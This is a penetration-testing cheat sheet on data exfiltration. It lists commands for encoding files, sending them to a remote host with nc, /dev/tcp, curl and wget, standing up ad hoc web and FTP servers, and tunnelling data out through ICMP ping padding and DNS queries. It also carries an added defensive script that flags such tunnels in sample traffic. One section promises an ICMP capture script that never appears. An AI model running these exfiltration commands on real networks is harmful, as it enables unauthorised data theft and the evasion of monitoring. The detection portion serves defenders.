Exfiltration
At a Glance
Data exfiltration, also called data extrusion or data exportation, is the unauthorized transfer of data from a device or network. [1]
Encoding
Base64
Linux encoding/decoding.
cat filename.ext | base64 -w0
cat filename.ext | base64 -d
Parameters
-w <cols>: wrap encoded lines after <cols> characters (default 76; 0 disables wrapping).
-d: decode data.
Windows encoding/decoding.
certutil -encode filename.ext output.ext
certutil -decode filename.ext output.ext
Steganography
Cloakify [2]
python ./cloakify.py filename.ext ./ciphers/topWebsites
Alternatively, use the interactive factory:
python ./cloakifyFactory.py
File Transfer
wget (recursive)
wget -r 10.0.0.3:1234
Parameters
-r: recursive download.
curl
curl 10.0.0.3/filename.ext -o filename.ext
Parameters
-o <file>: write output to <file> instead of stdout.
scp
scp user@10.0.0.3:/filename.ext .
nc
# Receiver
nc -nvlp 1234 > filename.ext
# Sender
nc -nv 10.0.0.1 1234 < filename.ext
Parameters
-n: do not do DNS lookups.
-v: print status messages.
-l: listen for an incoming connection.
-p <port>: local port used for listening.
/dev/tcp [3]
# /dev/tcp/<host>/<port> is a bash pseudo-device (no such file exists on disk); run these from bash, not /bin/sh
# Receiver
nc -nvlp 1234 > filename.ext
# Sender
cat filename.ext > /dev/tcp/10.0.0.1/1234
# Alternatively, the sender listens and the receiver pulls the file through /dev/tcp
# Sender
nc -w5 -nvlp 1234 < filename.ext
# Receiver
exec 6< /dev/tcp/10.0.0.1/1234
cat <&6 > filename.ext
Web Servers
Python
python -m SimpleHTTPServer 1234
python3 -m http.server 1234
See also: Simple HTTP Server with File Upload.
Ruby
ruby -run -e httpd . -p1234
ruby -r webrick -e 'WEBrick::HTTPServer.new(:Port => 1234, :DocumentRoot => Dir.pwd).start'
Perl
perl -MHTTP::Daemon -e '$d = HTTP::Daemon->new(LocalPort => 1234) or die $!; while($c = $d->accept){while($r = $c->get_request){$c->send_file_response(".".$r->url->path)}}'
Note: install HTTP::Daemon if not present with: sudo cpan HTTP::Daemon
PHP
php -S 127.0.0.1:1234
NodeJS
npm install -g http-server
http-server -p 1234
npm install -g node-static
static -p 1234
FTP Servers
Python
pip install pyftpdlib
python3 -m pyftpdlib -p 1234
NodeJS
npm install -g ftp-srv
ftp-srv ftp://0.0.0.0:1234 --root ./
Tunneling
ICMP
Capture ICMP packets with the following script:
Generate ICMP packets from the file hexdump.
xxd -p -c 8 filename.ext | while read h; do ping -c 1 -p $h 10.0.0.3; done
Parameters
xxd:
-p: output in PostScript continuous hexdump style, also known as plain hexdump style.
-c <cols>: format <cols> octets per line.
ping:
-c <count>: stop after sending <count> ECHO_REQUEST packets.
-p <pattern>: up to 16 "pad" bytes to fill out the packet you send.
Note: match the xxd column count (-c 8) with the data sliced in the script (packet[ICMP].load[-8:]).
DNS
Capture DNS packet data.
sudo tcpdump -n -i wlan0 -w dns_exfil.pcap udp and src 10.0.0.3 and port 53
Note: remember to point the sending host's DNS resolution at the host where the packets are being captured.
Generate DNS queries.
xxd -p -c 16 filename.ext | while read h; do ping -c 1 ${h}.domain.com; done
Extract exfiltrated data.
tcpdump -r dns_exfil.pcap 2>/dev/null | sed -e 's/.*\ \([A-Za-z0-9+/]*\).domain.com.*/\1/' | uniq | paste -sd "" - | xxd -r -p
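From the defender's side, both tunnels above leave a recognisable footprint: the ICMP loop produces echo requests whose data area is a short repeating pad instead of the default ping pattern, and the DNS loop produces queries whose leftmost label is a long run of hex digits. The following script is an added example, not part of this page or of any tool it references. It runs two heuristics over constructed input: a query-name check over tcpdump-style DNS lines (the line format and the thresholds are assumptions; adjust them to your own tcpdump build and baseline) and a payload classifier for ICMP echo requests that knows the Linux default payload (8-byte timestamp followed by offset-valued bytes) and the fixed 32-byte Windows payload. It generalises slightly beyond the page by also flagging long or high-entropy labels, since base64-style encodings would not trip a hex-only check.

```python
import math
import re
from collections import Counter

# Constructed sample log: tcpdump-style DNS query lines in the shape that
# "tcpdump -r dns_exfil.pcap" prints (timestamps, ports and names are made up).
SAMPLE_DNS_LOG = """\
12:00:01.000001 IP 10.0.0.3.40001 > 10.0.0.1.53: 1001+ A? www.example.com. (33)
12:00:02.000002 IP 10.0.0.3.40002 > 10.0.0.1.53: 1002+ A? 48656c6c6f2c20776f726c64210a.domain.com. (57)
12:00:02.000003 IP 10.0.0.3.40002 > 10.0.0.1.53: 1003+ AAAA? 48656c6c6f2c20776f726c64210a.domain.com. (57)
12:00:03.000004 IP 10.0.0.3.40003 > 10.0.0.1.53: 1004+ A? mail.example.com. (34)
12:00:04.000005 IP 10.0.0.3.40004 > 10.0.0.1.53: 1005+ A? 5468697320697320612074657374.domain.com. (57)
"""

# Query-name extractor for the line shape above (an assumption about the
# format; adjust if your tcpdump build prints queries differently).
QUERY_RE = re.compile(r"\s(?:A|AAAA|TXT|CNAME|MX)\?\s+(\S+?)\.?\s+\(\d+\)")
HEX_LABEL_RE = re.compile(r"^[0-9a-fA-F]{16,}$")


def shannon_entropy(data):
    """Bits of entropy per symbol of a str or bytes sequence (0.0 for empty)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def suspicious_dns_queries(log_text, max_label_len=32, entropy_threshold=3.5):
    """Return (query_name, reason) for each query whose leftmost label looks
    like encoded data: hex-only, unusually long, or high-entropy.
    The thresholds are assumptions; tune them against your own baseline."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m.group(1)
        label = qname.split(".")[0]
        if HEX_LABEL_RE.match(label):
            reason = "hex-only label"
        elif len(label) > max_label_len:
            reason = "long label"
        elif shannon_entropy(label) > entropy_threshold:
            reason = "high-entropy label"
        else:
            continue
        hits.append((qname, reason))
    return hits


# Payload of a Windows ping echo request (fixed 32-byte alphabet pattern).
WINDOWS_PING_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def is_default_linux_ping_payload(payload):
    """Linux ping without -p sends an 8-byte timestamp followed by bytes whose
    value equals their offset (0x08, 0x09, ...). Check that tail pattern."""
    if len(payload) <= 8:
        return False
    return all(b == (i & 0xFF) for i, b in enumerate(payload[8:], start=8))


def classify_icmp_payload(payload):
    """Label an echo-request payload as 'default', 'repeating-pattern'
    (what ping -p produces, as in the hexdump loop above) or 'other'."""
    if payload == WINDOWS_PING_PAYLOAD or is_default_linux_ping_payload(payload):
        return "default"
    body = payload[8:]
    # ping -p repeats a pad of at most 16 bytes across the data area, so look
    # for any period up to 16 (require at least two repetitions to count).
    for period in range(1, 17):
        if len(body) >= 2 * period and all(body[i] == body[i % period] for i in range(len(body))):
            return "repeating-pattern"
    return "other"


# Constructed sample payloads (the timestamp bytes are arbitrary).
TIMESTAMP = bytes.fromhex("0001020304050607")
DEFAULT_PAYLOAD = TIMESTAMP + bytes(range(8, 56))          # plain "ping" on Linux
PADDED_PAYLOAD = TIMESTAMP + bytes.fromhex("48656c6c6f2c2077") * 6  # 8-byte -p pad

if __name__ == "__main__":
    for name, reason in suspicious_dns_queries(SAMPLE_DNS_LOG):
        print(f"DNS  {reason:20s} {name}")
    for label, payload in [("default", DEFAULT_PAYLOAD), ("padded", PADDED_PAYLOAD)]:
        print(f"ICMP {label:8s} -> {classify_icmp_payload(payload)}")
```

In production traffic, ping -p is almost never used, so both "repeating-pattern" and "other" are worth an alert on their own; the DNS check is most useful when applied per source host and per second-level domain, because a single encoded label is noise but hundreds of them to one domain in a short window is the pattern the loop above produces.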
PacketWhisper [4]
Capture packets with tcpdump, as described above.
Cloak, exfiltrate and decloak from the CLI.
sudo python3 packetWhisper.py
Further Reading
[1] “Exfiltration, Tactic TA0010 - Enterprise.” MITRE ATT&CK®, https://attack.mitre.org/tactics/TA0010/
[2] TryCatchHCF. “TryCatchHCF/Cloakify: CloakifyFactory.” GitHub, https://github.com/TryCatchHCF/Cloakify
[3] “/dev.” Advanced Bash-Scripting Guide, The Linux Documentation Project, https://tldp.org/LDP/abs/html/devref1.html
[4] TryCatchHCF. “PacketWhisper.” GitHub, https://github.com/TryCatchHCF/PacketWhisper